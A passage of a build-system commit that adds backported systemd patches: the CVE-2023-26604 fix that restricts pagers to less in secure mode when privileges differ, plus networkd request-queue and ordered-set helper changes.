12users:
13
14- Previusly we would set LESSSECURE=1 and trust the pager to make use of
15 it. But this has an effect only on less. We need to not start pagers which
16 are insecure when in secure mode. In particular more is like that and is a
17 very popular pager.
18
19- We don't enable secure mode always, which means that those other pagers can
20 reasonably used.
21
22- We do the right thing by default, but the user has ultimate control by
23 setting SYSTEMD_PAGERSECURE.
24
25Fixes #5666.
26
27v2:
28- also check $PKEXEC_UID
29
30v3:
31- use 'sd_pid_get_owner_uid() != geteuid()' as the condition
32
33CVE: CVE-2023-26604
34Upstream-Status: Backport [https://github.com/systemd/systemd/pull/17270/commits/0a42426d797406b4b01a0d9c13bb759c2629d108]
35Comments: Hunk refreshed
36Signed-off-by: rajmohan r <rajmohan.r@kpit.com>
37---
38 man/less-variables.xml | 30 +++++++++++++++----
39 src/shared/pager.c | 63 ++++++++++++++++++++++++++-------------
40 2 files changed, 66 insertions(+), 27 deletions(-)
41
42diff --git a/man/less-variables.xml b/man/less-variables.xml
43index c52511c..049e9f7 100644
44--- a/man/less-variables.xml
45+++ b/man/less-variables.xml
46@@ -65,12 +65,30 @@
47 </varlistentry>
48
49 <varlistentry id='lesssecure'>
50- <term><varname>$SYSTEMD_LESSSECURE</varname></term>
51-
52- <listitem><para>Takes a boolean argument. Overrides the <varname>$LESSSECURE</varname> environment
53- variable when invoking the pager, which controls the "secure" mode of less (which disables commands
54- such as <literal>|</literal> which allow to easily shell out to external command lines). By default
55- less secure mode is enabled, with this setting it may be disabled.</para></listitem>
56+ <term><varname>$SYSTEMD_PAGERSECURE</varname></term>
57+
58+ <listitem><para>Takes a boolean argument. When true, the "secure" mode of the pager is enabled; if
59+ false, disabled. If <varname>$SYSTEMD_PAGERSECURE</varname> is not set at all, secure mode is enabled
60+ if the effective UID is not the same as the owner of the login session, see <citerefentry
61+ project='man-pages'><refentrytitle>geteuid</refentrytitle><manvolnum>2</manvolnum></citerefentry> and
62+ <citerefentry><refentrytitle>sd_pid_get_owner_uid</refentrytitle><manvolnum>3</manvolnum></citerefentry>.
63+ In secure mode, <option>LESSSECURE=1</option> will be set when invoking the pager, and the pager shall
64+ disable commands that open or create new files or start new subprocesses. When
65+ <varname>$SYSTEMD_PAGERSECURE</varname> is not set at all, pagers which are not known to implement
66+ secure mode will not be used. (Currently only
67+ <citerefentry><refentrytitle>less</refentrytitle><manvolnum>1</manvolnum></citerefentry> implements
68+ secure mode.)</para>
69+
70+ <para>Note: when commands are invoked with elevated privileges, for example under <citerefentry
71+ project='man-pages'><refentrytitle>sudo</refentrytitle><manvolnum>8</manvolnum></citerefentry> or
72+ <citerefentry
73+ project='die-net'><refentrytitle>pkexec</refentrytitle><manvolnum>1</manvolnum></citerefentry>, care
74+ must be taken to ensure that unintended interactive features are not enabled. "Secure" mode for the
75+ pager may be enabled automatically as describe above. Setting <varname>SYSTEMD_PAGERSECURE=0</varname>
76+ or not removing it from the inherited environment allows the user to invoke arbitrary commands. Note
77+ that if the <varname>$SYSTEMD_PAGER</varname> or <varname>$PAGER</varname> variables are to be
78+ honoured, <varname>$SYSTEMD_PAGERSECURE</varname> must be set too. It might be reasonable to completly
79+ disable the pager using <option>--no-pager</option> instead.</para></listitem>
80 </varlistentry>
81
82 <varlistentry id='colors'>
83diff --git a/src/shared/pager.c b/src/shared/pager.c
84index a3b6576..a72d9ea 100644
85--- a/src/shared/pager.c
86+++ b/src/shared/pager.c
87@@ -8,6 +8,8 @@
88 #include <sys/prctl.h>
89 #include <unistd.h>
90
91+#include "sd-login.h"
92+
93 #include "copy.h"
94 #include "env-util.h"
95 #include "fd-util.h"
96@@ -164,25 +166,42 @@ int pager_open(PagerFlags flags) {
97 }
98
99 /* People might invoke us from sudo, don't needlessly allow less to be a way to shell out
100- * privileged stuff. */
101- r = getenv_bool("SYSTEMD_LESSSECURE");
102- if (r == 0) { /* Remove env var if off */
103- if (unsetenv("LESSSECURE") < 0) {
104- log_error_errno(errno, "Failed to uset environment variable LESSSECURE: %m");
105- _exit(EXIT_FAILURE);
106- }
107- } else {
108- /* Set env var otherwise */
109+ * privileged stuff. If the user set $SYSTEMD_PAGERSECURE, trust their configuration of the
110+ * pager. If they didn't, use secure mode when under euid is changed. If $SYSTEMD_PAGERSECURE
111+ * wasn't explicitly set, and we autodetect the need for secure mode, only use the pager we
112+ * know to be good. */
113+ int use_secure_mode = getenv_bool("SYSTEMD_PAGERSECURE");
114+ bool trust_pager = use_secure_mode >= 0;
115+ if (use_secure_mode == -ENXIO) {
116+ uid_t uid;
117+
118+ r = sd_pid_get_owner_uid(0, &uid);
119 if (r < 0)
120- log_warning_errno(r, "Unable to parse $SYSTEMD_LESSSECURE, ignoring: %m");
121+ log_debug_errno(r, "sd_pid_get_owner_uid() failed, enabling pager secure mode: %m");
122
123- if (setenv("LESSSECURE", "1", 1) < 0) {
124- log_error_errno(errno, "Failed to set environment variable LESSSECURE: %m");
125- _exit(EXIT_FAILURE);
126- }
127+ use_secure_mode = r < 0 || uid != geteuid();
128+
129+ } else if (use_secure_mode < 0) {
130+ log_warning_errno(use_secure_mode, "Unable to parse $SYSTEMD_PAGERSECURE, assuming true: %m");
131+ use_secure_mode = true;
132 }
133
134- if (pager_args) {
135+ /* We generally always set variables used by less, even if we end up using a different pager.
136+ * They shouldn't hurt in any case, and ideally other pagers would look at them too. */
137+ if (use_secure_mode)
138+ r = setenv("LESSSECURE", "1", 1);
139+ else
140+ r = unsetenv("LESSSECURE");
141+ if (r < 0) {
142+ log_error_errno(errno, "Failed to adjust environment variable LESSSECURE: %m");
143+ _exit(EXIT_FAILURE);
144+ }
145+
146+ if (trust_pager && pager_args) { /* The pager config might be set globally, and we cannot
147+ * know if the user adjusted it to be appropriate for the
148+ * secure mode. Thus, start the pager specified through
149+ * envvars only when $SYSTEMD_PAGERSECURE was explicitly set
150+ * as well. */
151 r = loop_write(exe_name_pipe[1], pager_args[0], strlen(pager_args[0]) + 1, false);
152 if (r < 0) {
153 log_error_errno(r, "Failed to write pager name to socket: %m");
154@@ -194,13 +213,14 @@ int pager_open(PagerFlags flags) {
155 "Failed to execute '%s', using fallback pagers: %m", pager_args[0]);
156 }
157
158- /* Debian's alternatives command for pagers is
159- * called 'pager'. Note that we do not call
160- * sensible-pagers here, since that is just a
161- * shell script that implements a logic that
162- * is similar to this one anyway, but is
163- * Debian-specific. */
164+ /* Debian's alternatives command for pagers is called 'pager'. Note that we do not call
165+ * sensible-pagers here, since that is just a shell script that implements a logic that is
166+ * similar to this one anyway, but is Debian-specific. */
167 FOREACH_STRING(exe, "pager", "less", "more") {
168+ /* Only less implements secure mode right now. */
169+ if (use_secure_mode && !streq(exe, "less"))
170+ continue;
171+
172 r = loop_write(exe_name_pipe[1], exe, strlen(exe) + 1, false);
173 if (r < 0) {
174 log_error_errno(r, "Failed to write pager name to socket: %m");
175@@ -211,6 +231,7 @@ int pager_open(PagerFlags flags) {
176 "Failed to execute '%s', using next fallback pager: %m", exe);
177 }
178
179+ /* Our builtin is also very secure. */
180 r = loop_write(exe_name_pipe[1], "(built-in)", strlen("(built-in)") + 1, false);
181 if (r < 0) {
182 log_error_errno(r, "Failed to write pager name to socket: %m");
diff --git a/meta/recipes-core/systemd/systemd/CVE-2023-26604-4.patch b/meta/recipes-core/systemd/systemd/CVE-2023-26604-4.patch
new file mode 100644
index 0000000000..bc6b0a91c2
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/CVE-2023-26604-4.patch
@@ -0,0 +1,32 @@
1From b8f736b30e20a2b44e7c34bb4e43b0d97ae77e3c Mon Sep 17 00:00:00 2001
2From: Lennart Poettering <lennart@poettering.net>
3Date: Thu, 15 Oct 2020 10:54:48 +0200
4Subject: [PATCH] pager: lets check SYSTEMD_PAGERSECURE with secure_getenv()
5
6I can't think of any real vulnerability about this, but it still feels
7better to check a variable with "secure" in its name with
8secure_getenv() rather than plain getenv().
9
10Paranoia FTW!
11
12CVE: CVE-2023-26604
13Upstream-Status: Backport [https://github.com/systemd/systemd/pull/17359/commits/b8f736b30e20a2b44e7c34bb4e43b0d97ae77e3c]
14Comments: Hunk refreshed
15Signed-off-by: rajmohan r <rajmohan.r@kpit.com>
16---
17 src/shared/pager.c | 2 +-
18 1 file changed, 1 insertion(+), 1 deletion(-)
19
20diff --git a/src/shared/pager.c b/src/shared/pager.c
21index a72d9ea..250519c 100644
22--- a/src/shared/pager.c
23+++ b/src/shared/pager.c
24@@ -170,7 +170,7 @@ int pager_open(PagerFlags flags) {
25 * pager. If they didn't, use secure mode when under euid is changed. If $SYSTEMD_PAGERSECURE
26 * wasn't explicitly set, and we autodetect the need for secure mode, only use the pager we
27 * know to be good. */
28- int use_secure_mode = getenv_bool("SYSTEMD_PAGERSECURE");
29+ int use_secure_mode = getenv_bool_secure("SYSTEMD_PAGERSECURE");
30 bool trust_pager = use_secure_mode >= 0;
31 if (use_secure_mode == -ENXIO) {
32 uid_t uid;
diff --git a/meta/recipes-core/systemd/systemd/basic-pass-allocation-info-for-ordered-set-new-and-introd.patch b/meta/recipes-core/systemd/systemd/basic-pass-allocation-info-for-ordered-set-new-and-introd.patch
new file mode 100644
index 0000000000..86d9b0499a
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/basic-pass-allocation-info-for-ordered-set-new-and-introd.patch
@@ -0,0 +1,78 @@
1From 1f25c71d9d0b5fe6cf383c347dcebc2443a99fe1 Mon Sep 17 00:00:00 2001
2From: =?UTF-8?q?Zbigniew=20J=C4=99drzejewski-Szmek?= <zbyszek@in.waw.pl>
3Date: Tue, 1 Sep 2020 12:42:35 +0200
4Subject: [PATCH] basic: pass allocation info for ordered_set_new() and
5 introduce ordered_set_ensure_put()
6
7Upstream-Status: Backport [https://github.com/systemd/systemd-stable/commit/1f25c71d9d0b5fe6cf383c347dcebc2443a99fe1]
8Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
9
10---
11 src/basic/ordered-set.c | 21 +++++++++++++++++++++
12 src/basic/ordered-set.h | 18 +++++++-----------
13 2 files changed, 28 insertions(+), 11 deletions(-)
14
15diff --git a/src/basic/ordered-set.c b/src/basic/ordered-set.c
16index 7fdb47e064..fb82c17b5a 100644
17--- a/src/basic/ordered-set.c
18+++ b/src/basic/ordered-set.c
19@@ -4,6 +4,27 @@
20 #include "ordered-set.h"
21 #include "strv.h"
22
23+int _ordered_set_ensure_allocated(OrderedSet **s, const struct hash_ops *ops HASHMAP_DEBUG_PARAMS) {
24+ if (*s)
25+ return 0;
26+
27+ *s = _ordered_set_new(ops HASHMAP_DEBUG_PASS_ARGS);
28+ if (!*s)
29+ return -ENOMEM;
30+
31+ return 0;
32+}
33+
34+int _ordered_set_ensure_put(OrderedSet **s, const struct hash_ops *ops, void *p HASHMAP_DEBUG_PARAMS) {
35+ int r;
36+
37+ r = _ordered_set_ensure_allocated(s, ops HASHMAP_DEBUG_PASS_ARGS);
38+ if (r < 0)
39+ return r;
40+
41+ return ordered_set_put(*s, p);
42+}
43+
44 int ordered_set_consume(OrderedSet *s, void *p) {
45 int r;
46
47diff --git a/src/basic/ordered-set.h b/src/basic/ordered-set.h
48index a42a57eb49..2c241a808b 100644
49--- a/src/basic/ordered-set.h
50+++ b/src/basic/ordered-set.h
51@@ -7,20 +7,16 @@
52
53 typedef struct OrderedSet OrderedSet;
54
55-static inline OrderedSet* ordered_set_new(const struct hash_ops *ops) {
56- return (OrderedSet*) ordered_hashmap_new(ops);
57+static inline OrderedSet* _ordered_set_new(const struct hash_ops *ops HASHMAP_DEBUG_PARAMS) {
58+ return (OrderedSet*) internal_ordered_hashmap_new(ops HASHMAP_DEBUG_PASS_ARGS);
59 }
60+#define ordered_set_new(ops) _ordered_set_new(ops HASHMAP_DEBUG_SRC_ARGS)
61
62-static inline int ordered_set_ensure_allocated(OrderedSet **s, const struct hash_ops *ops) {
63- if (*s)
64- return 0;
65+int _ordered_set_ensure_allocated(OrderedSet **s, const struct hash_ops *ops HASHMAP_DEBUG_PARAMS);
66+#define ordered_set_ensure_allocated(s, ops) _ordered_set_ensure_allocated(s, ops HASHMAP_DEBUG_SRC_ARGS)
67
68- *s = ordered_set_new(ops);
69- if (!*s)
70- return -ENOMEM;
71-
72- return 0;
73-}
74+int _ordered_set_ensure_put(OrderedSet **s, const struct hash_ops *ops, void *p HASHMAP_DEBUG_PARAMS);
75+#define ordered_set_ensure_put(s, hash_ops, key) _ordered_set_ensure_put(s, hash_ops, key HASHMAP_DEBUG_SRC_ARGS)
76
77 static inline OrderedSet* ordered_set_free(OrderedSet *s) {
78 return (OrderedSet*) ordered_hashmap_free((OrderedHashmap*) s);
diff --git a/meta/recipes-core/systemd/systemd/introduce-ordered_set_clear-free-with-destructor.patch b/meta/recipes-core/systemd/systemd/introduce-ordered_set_clear-free-with-destructor.patch
new file mode 100644
index 0000000000..42b6e05b55
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/introduce-ordered_set_clear-free-with-destructor.patch
@@ -0,0 +1,35 @@
1From d38a6476aad3f2cc80a2a4bc11f3898cc06a70f5 Mon Sep 17 00:00:00 2001
2From: Yu Watanabe <watanabe.yu+github@gmail.com>
3Date: Mon, 26 Apr 2021 23:52:40 +0900
4Subject: [PATCH] ordered-set: introduce
5 ordered_set_clear/free_with_destructor()
6
7Upstream-Status: Backport [https://github.com/systemd/systemd-stable/commit/d38a6476aad3f2cc80a2a4bc11f3898cc06a70f5]
8Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
9
10---
11 src/basic/ordered-set.h | 11 +++++++++++
12 1 file changed, 11 insertions(+)
13
14diff --git a/src/basic/ordered-set.h b/src/basic/ordered-set.h
15index a377f20b1f..64df41766f 100644
16--- a/src/basic/ordered-set.h
17+++ b/src/basic/ordered-set.h
18@@ -63,6 +63,17 @@ void ordered_set_print(FILE *f, const char *field, OrderedSet *s);
19 #define ORDERED_SET_FOREACH(e, s, i) \
20 for ((i) = ITERATOR_FIRST; ordered_set_iterate((s), &(i), (void**)&(e)); )
21
22+#define ordered_set_clear_with_destructor(s, f) \
23+ ({ \
24+ OrderedSet *_s = (s); \
25+ void *_item; \
26+ while ((_item = ordered_set_steal_first(_s))) \
27+ f(_item); \
28+ _s; \
29+ })
30+#define ordered_set_free_with_destructor(s, f) \
31+ ordered_set_free(ordered_set_clear_with_destructor(s, f))
32+
33 DEFINE_TRIVIAL_CLEANUP_FUNC(OrderedSet*, ordered_set_free);
34 DEFINE_TRIVIAL_CLEANUP_FUNC(OrderedSet*, ordered_set_free_free);
35
diff --git a/meta/recipes-core/systemd/systemd/network-add-skeleton-of-request-queue.patch b/meta/recipes-core/systemd/systemd/network-add-skeleton-of-request-queue.patch
new file mode 100644
index 0000000000..06c523834d
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/network-add-skeleton-of-request-queue.patch
@@ -0,0 +1,285 @@
1From 19d9a5adf0c1a6b5a243eea0390f6f6526d569de Mon Sep 17 00:00:00 2001
2From: Yu Watanabe <watanabe.yu+github@gmail.com>
3Date: Fri, 7 May 2021 15:39:16 +0900
4Subject: [PATCH] network: add skeleton of request queue
5
6This will be used in later commits.
7
8Upstream-Status: Backport [https://github.com/systemd/systemd-stable/commit/19d9a5adf0c1a6b5a243eea0390f6f6526d569de]
9Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
10
11---
12 src/network/meson.build | 2 +
13 src/network/networkd-link.c | 20 +++++-
14 src/network/networkd-manager.c | 7 ++
15 src/network/networkd-manager.h | 2 +
16 src/network/networkd-queue.c | 121 +++++++++++++++++++++++++++++++++
17 src/network/networkd-queue.h | 42 ++++++++++++
18 6 files changed, 192 insertions(+), 2 deletions(-)
19 create mode 100644 src/network/networkd-queue.c
20 create mode 100644 src/network/networkd-queue.h
21
22diff --git a/src/network/meson.build b/src/network/meson.build
23index 4fca3106dc..a8b9232e64 100644
24--- a/src/network/meson.build
25+++ b/src/network/meson.build
26@@ -105,6 +105,8 @@ sources = files('''
27 networkd-network.h
28 networkd-nexthop.c
29 networkd-nexthop.h
30+ networkd-queue.c
31+ networkd-queue.h
32 networkd-route.c
33 networkd-route.h
34 networkd-routing-policy-rule.c
35diff --git a/src/network/networkd-link.c b/src/network/networkd-link.c
36index 34359b2541..2f33305a27 100644
37--- a/src/network/networkd-link.c
38+++ b/src/network/networkd-link.c
39@@ -30,6 +30,7 @@
40 #include "networkd-manager.h"
41 #include "networkd-ndisc.h"
42 #include "networkd-neighbor.h"
43+#include "networkd-queue.h"
44 #include "networkd-radv.h"
45 #include "networkd-routing-policy-rule.h"
46 #include "networkd-wifi.h"
47
48@@ -2232,6 +2244,8 @@ static int link_reconfigure_internal(Link *link, sd_netlink_message *m, bool for
49 if (r < 0)
50 return r;
51
52+ link_drop_requests(link);
53+
54 r = link_drop_config(link);
55 if (r < 0)
56 return r;
57@@ -2664,6 +2678,8 @@ static int link_carrier_lost(Link *link) {
58 return r;
59 }
60
61+ link_drop_requests(link);
62+
63 r = link_drop_config(link);
64 if (r < 0)
65 return r;
66diff --git a/src/network/networkd-manager.c b/src/network/networkd-manager.c
67index 562ce5ca54..fd576169a9 100644
68--- a/src/network/networkd-manager.c
69+++ b/src/network/networkd-manager.c
70@@ -34,6 +34,7 @@
71 #include "networkd-manager-bus.h"
72 #include "networkd-manager.h"
73 #include "networkd-network-bus.h"
74+#include "networkd-queue.h"
75 #include "networkd-speed-meter.h"
76 #include "ordered-set.h"
77 #include "path-util.h"
78@@ -406,6 +407,10 @@ int manager_new(Manager **ret) {
79 if (r < 0)
80 return r;
81
82+ r = sd_event_add_post(m->event, NULL, manager_process_requests, m);
83+ if (r < 0)
84+ return r;
85+
86 r = manager_connect_rtnl(m);
87 if (r < 0)
88 return r;
89@@ -446,6 +451,8 @@ Manager* manager_free(Manager *m) {
90
91 free(m->state_file);
92
93+ m->request_queue = ordered_set_free_with_destructor(m->request_queue, request_free);
94+
95 while ((a = hashmap_first_key(m->dhcp6_prefixes)))
96 (void) dhcp6_prefix_remove(m, a);
97 m->dhcp6_prefixes = hashmap_free(m->dhcp6_prefixes);
98diff --git a/src/network/networkd-manager.h b/src/network/networkd-manager.h
99index 301b97c1a1..26e8802871 100644
100--- a/src/network/networkd-manager.h
101+++ b/src/network/networkd-manager.h
102@@ -91,6 +91,8 @@ struct Manager {
103 usec_t speed_meter_usec_old;
104
105 bool dhcp4_prefix_root_cannot_set_table;
106+
107+ OrderedSet *request_queue;
108 };
109
110 int manager_new(Manager **ret);
111diff --git a/src/network/networkd-queue.c b/src/network/networkd-queue.c
112new file mode 100644
113index 0000000000..24bb2c845d
114--- /dev/null
115+++ b/src/network/networkd-queue.c
116@@ -0,0 +1,121 @@
117+/* SPDX-License-Identifier: LGPL-2.1-or-later */
118+
119+#include "networkd-address.h"
120+#include "networkd-manager.h"
121+#include "networkd-neighbor.h"
122+#include "networkd-nexthop.h"
123+#include "networkd-route.h"
124+#include "networkd-routing-policy-rule.h"
125+#include "networkd-queue.h"
126+
127+static void request_free_object(RequestType type, void *object) {
128+ switch(type) {
129+ default:
130+ assert_not_reached("invalid request type.");
131+ }
132+}
133+
134+Request *request_free(Request *req) {
135+ if (!req)
136+ return NULL;
137+
138+ if (req->on_free)
139+ req->on_free(req);
140+ if (req->consume_object)
141+ request_free_object(req->type, req->object);
142+ if (req->link && req->link->manager)
143+ ordered_set_remove(req->link->manager->request_queue, req);
144+ link_unref(req->link);
145+
146+ return mfree(req);
147+}
148+
149+DEFINE_TRIVIAL_CLEANUP_FUNC(Request*, request_free);
150+
151+void request_drop(Request *req) {
152+ if (req->message_counter)
153+ (*req->message_counter)--;
154+
155+ request_free(req);
156+}
157+
158+int link_queue_request(
159+ Link *link,
160+ RequestType type,
161+ void *object,
162+ bool consume_object,
163+ unsigned *message_counter,
164+ link_netlink_message_handler_t netlink_handler,
165+ Request **ret) {
166+
167+ _cleanup_(request_freep) Request *req = NULL;
168+ int r;
169+
170+ assert(link);
171+ assert(link->manager);
172+ assert(type >= 0 && type < _REQUEST_TYPE_MAX);
173+ assert(object);
174+ assert(netlink_handler);
175+
176+ req = new(Request, 1);
177+ if (!req) {
178+ if (consume_object)
179+ request_free_object(type, object);
180+ return -ENOMEM;
181+ }
182+
183+ *req = (Request) {
184+ .link = link,
185+ .type = type,
186+ .object = object,
187+ .consume_object = consume_object,
188+ .message_counter = message_counter,
189+ .netlink_handler = netlink_handler,
190+ };
191+
192+ link_ref(link);
193+
194+ r = ordered_set_ensure_put(&link->manager->request_queue, NULL, req);
195+ if (r < 0)
196+ return r;
197+
198+ if (req->message_counter)
199+ (*req->message_counter)++;
200+
201+ if (ret)
202+ *ret = req;
203+
204+ TAKE_PTR(req);
205+ return 0;
206+}
207+
208+int manager_process_requests(sd_event_source *s, void *userdata) {
209+ Manager *manager = userdata;
210+ int r;
211+
212+ assert(manager);
213+
214+ for (;;) {
215+ bool processed = false;
216+ Request *req;
217+ Iterator i;
218+ ORDERED_SET_FOREACH(req, manager->request_queue, i) {
219+ switch(req->type) {
220+ default:
221+ return -EINVAL;
222+ }
223+ if (r < 0)
224+ link_enter_failed(req->link);
225+ if (r > 0) {
226+ ordered_set_remove(manager->request_queue, req);
227+ request_free(req);
228+ processed = true;
229+ }
230+ }
231+
232+ if (!processed)
233+ break;
234+ }
235+
236+ return 0;
237+}
238diff --git a/src/network/networkd-queue.h b/src/network/networkd-queue.h
239new file mode 100644
240index 0000000000..4558ae548f
241--- /dev/null
242+++ b/src/network/networkd-queue.h
243@@ -0,0 +1,42 @@
244+/* SPDX-License-Identifier: LGPL-2.1-or-later */
245+#pragma once
246+
247+#include "sd-event.h"
248+
249+#include "networkd-link.h"
250+
251+typedef struct Request Request;
252+
253+typedef int (*request_after_configure_handler_t)(Request*, void*);
254+typedef void (*request_on_free_handler_t)(Request*);
255+
256+typedef enum RequestType {
257+ _REQUEST_TYPE_MAX,
258+ _REQUEST_TYPE_INVALID = -EINVAL,
259+} RequestType;
260+
261+typedef struct Request {
262+ Link *link;
263+ RequestType type;
264+ bool consume_object;
265+ void *object;
266+ void *userdata;
267+ unsigned *message_counter;
268+ link_netlink_message_handler_t netlink_handler;
269+ request_after_configure_handler_t after_configure;
270+ request_on_free_handler_t on_free;
271+} Request;
272+
273+Request *request_free(Request *req);
274+void request_drop(Request *req);
275+
276+int link_queue_request(
277+ Link *link,
278+ RequestType type,
279+ void *object,
280+ bool consume_object,
281+ unsigned *message_counter,
282+ link_netlink_message_handler_t netlink_handler,
283+ Request **ret);
284+
285+int manager_process_requests(sd_event_source *s, void *userdata);
diff --git a/meta/recipes-core/systemd/systemd/network-also-drop-requests-when-link-enters-linger-state.patch b/meta/recipes-core/systemd/systemd/network-also-drop-requests-when-link-enters-linger-state.patch
new file mode 100644
index 0000000000..4c402e7e55
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/network-also-drop-requests-when-link-enters-linger-state.patch
@@ -0,0 +1,50 @@
1From 56001f023305ea99329e27141d6e6067596491a9 Mon Sep 17 00:00:00 2001
2From: Yu Watanabe <watanabe.yu+github@gmail.com>
3Date: Mon, 17 May 2021 15:32:57 +0900
4Subject: [PATCH] network: also drop requests when link enters linger state
5
6Otherwise, if link is removed, several references to the link in remain
7exist in requests.
8
9Upstream-Status: Backport [https://github.com/systemd/systemd-stable/commit/56001f023305ea99329e27141d6e6067596491a9]
10Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
11
12---
13 src/network/networkd-link.c | 24 +++++++++++++-----------
14 1 file changed, 13 insertions(+), 11 deletions(-)
15
16diff --git a/src/network/networkd-link.c b/src/network/networkd-link.c
17index 67d01ac44d..b56c232eca 100644
18--- a/src/network/networkd-link.c
19+++ b/src/network/networkd-link.c
20@@ -1771,6 +1771,18 @@ static void link_drop_from_master(Link *link, NetDev *netdev) {
21 link_unref(set_remove(master->slaves, link));
22 }
23
24+static void link_drop_requests(Link *link) {
25+ Request *req;
26+ Iterator i;
27+
28+ assert(link);
29+ assert(link->manager);
30+
31+ ORDERED_SET_FOREACH(req, link->manager->request_queue, i)
32+ if (req->link == link)
33+ request_drop(req);
34+}
35+
36 void link_drop(Link *link) {
37 if (!link)
38 return;
39@@ -1782,6 +1793,8 @@ void link_drop(Link *link) {
40 /* Drop all references from other links and manager. Note that async netlink calls may have
41 * references to the link, and they will be dropped when we receive replies. */
42
43+ link_drop_requests(link);
44+
45 link_free_carrier_maps(link);
46
47 if (link->network) {
48--
492.17.1
50
diff --git a/meta/recipes-core/systemd/systemd/network-fix-Link-reference-counter-issue.patch b/meta/recipes-core/systemd/systemd/network-fix-Link-reference-counter-issue.patch
new file mode 100644
index 0000000000..a186bb4095
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/network-fix-Link-reference-counter-issue.patch
@@ -0,0 +1,278 @@
1From cc2d7efc5ca09a7de4bec55e80476986839a655c Mon Sep 17 00:00:00 2001
2From: Yu Watanabe <watanabe.yu+github@gmail.com>
3Date: Fri, 14 May 2021 15:58:15 +0900
4Subject: [PATCH] network: fix Link reference counter issue
5
6Previously, when link_new() fails, `link_unref()` was called, so,
7`Manager::links` may become dirty.
8This introduces `link_drop_or_unref()` and it will be called on
9failure.
10
11Upstream-Status: Backport [https://github.com/systemd/systemd-stable/commit/cc2d7efc5ca09a7de4bec55e80476986839a655c]
12Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
13
14---
15 src/network/networkd-link.c | 240 ++++++++++++++++++------------------
16 1 file changed, 122 insertions(+), 118 deletions(-)
17
18diff --git a/src/network/networkd-link.c b/src/network/networkd-link.c
19index b56c232eca..d493afda4c 100644
20--- a/src/network/networkd-link.c
21+++ b/src/network/networkd-link.c
22@@ -540,109 +540,6 @@ static int link_update_flags(Link *link,
23 return 0;
24 }
25
26-static int link_new(Manager *manager, sd_netlink_message *message, Link **ret) {
27- _cleanup_(link_unrefp) Link *link = NULL;
28- uint16_t type;
29- const char *ifname, *kind = NULL;
30- int r, ifindex;
31- unsigned short iftype;
32-
33- assert(manager);
34- assert(message);
35- assert(ret);
36-
37- /* check for link kind */
38- r = sd_netlink_message_enter_container(message, IFLA_LINKINFO);
39- if (r == 0) {
40- (void) sd_netlink_message_read_string(message, IFLA_INFO_KIND, &kind);
41- r = sd_netlink_message_exit_container(message);
42- if (r < 0)
43- return r;
44- }
45-
46- r = sd_netlink_message_get_type(message, &type);
47- if (r < 0)
48- return r;
49- else if (type != RTM_NEWLINK)
50- return -EINVAL;
51-
52- r = sd_rtnl_message_link_get_ifindex(message, &ifindex);
53- if (r < 0)
54- return r;
55- else if (ifindex <= 0)
56- return -EINVAL;
57-
58- r = sd_rtnl_message_link_get_type(message, &iftype);
59- if (r < 0)
60- return r;
61-
62- r = sd_netlink_message_read_string(message, IFLA_IFNAME, &ifname);
63- if (r < 0)
64- return r;
65-
66- link = new(Link, 1);
67- if (!link)
68- return -ENOMEM;
69-
70- *link = (Link) {
71- .n_ref = 1,
72- .manager = manager,
73- .state = LINK_STATE_PENDING,
74- .ifindex = ifindex,
75- .iftype = iftype,
76-
77- .n_dns = (unsigned) -1,
78- .dns_default_route = -1,
79- .llmnr = _RESOLVE_SUPPORT_INVALID,
80- .mdns = _RESOLVE_SUPPORT_INVALID,
81- .dnssec_mode = _DNSSEC_MODE_INVALID,
82- .dns_over_tls_mode = _DNS_OVER_TLS_MODE_INVALID,
83- };
84-
85- link->ifname = strdup(ifname);
86- if (!link->ifname)
87- return -ENOMEM;
88-
89- if (kind) {
90- link->kind = strdup(kind);
91- if (!link->kind)
92- return -ENOMEM;
93- }
94-
95- r = sd_netlink_message_read_u32(message, IFLA_MASTER, (uint32_t *)&link->master_ifindex);
96- if (r < 0)
97- log_link_debug_errno(link, r, "New device has no master, continuing without");
98-
99- r = sd_netlink_message_read_ether_addr(message, IFLA_ADDRESS, &link->mac);
100- if (r < 0)
101- log_link_debug_errno(link, r, "MAC address not found for new device, continuing without");
102-
103- if (asprintf(&link->state_file, "/run/systemd/netif/links/%d", link->ifindex) < 0)
104- return -ENOMEM;
105-
106- if (asprintf(&link->lease_file, "/run/systemd/netif/leases/%d", link->ifindex) < 0)
107- return -ENOMEM;
108-
109- if (asprintf(&link->lldp_file, "/run/systemd/netif/lldp/%d", link->ifindex) < 0)
110- return -ENOMEM;
111-
112- r = hashmap_ensure_allocated(&manager->links, NULL);
113- if (r < 0)
114- return r;
115-
116- r = hashmap_put(manager->links, INT_TO_PTR(link->ifindex), link);
117- if (r < 0)
118- return r;
119-
120- r = link_update_flags(link, message, false);
121- if (r < 0)
122- return r;
123-
124- *ret = TAKE_PTR(link);
125-
126- return 0;
127-}
128-
129 void link_ntp_settings_clear(Link *link) {
130 link->ntp = strv_free(link->ntp);
131 }
132@@ -2030,9 +1927,9 @@ static void link_drop_requests(Link *lin
133 request_drop(req);
134 }
135
136-void link_drop(Link *link) {
137+Link *link_drop(Link *link) {
138 if (!link)
139- return;
140+ return NULL;
141
142 assert(link->manager);
143
144@@ -2057,7 +1954,7 @@ void link_drop(Link *link) {
145
146 /* The following must be called at last. */
147 assert_se(hashmap_remove(link->manager->links, INT_TO_PTR(link->ifindex)) == link);
148- link_unref(link);
149+ return link_unref(link);
150 }
151
152 static int link_joined(Link *link) {
153@@ -3295,6 +3192,112 @@ ipv4ll_address_fail:
154
155 return 0;
156 }
157+
158+static Link *link_drop_or_unref(Link *link) {
159+ if (!link)
160+ return NULL;
161+ if (!link->manager)
162+ return link_unref(link);
163+ return link_drop(link);
164+}
165+
166+DEFINE_TRIVIAL_CLEANUP_FUNC(Link*, link_drop_or_unref);
167+
168+static int link_new(Manager *manager, sd_netlink_message *message, Link **ret) {
169+ _cleanup_(link_drop_or_unrefp) Link *link = NULL;
170+ uint16_t type;
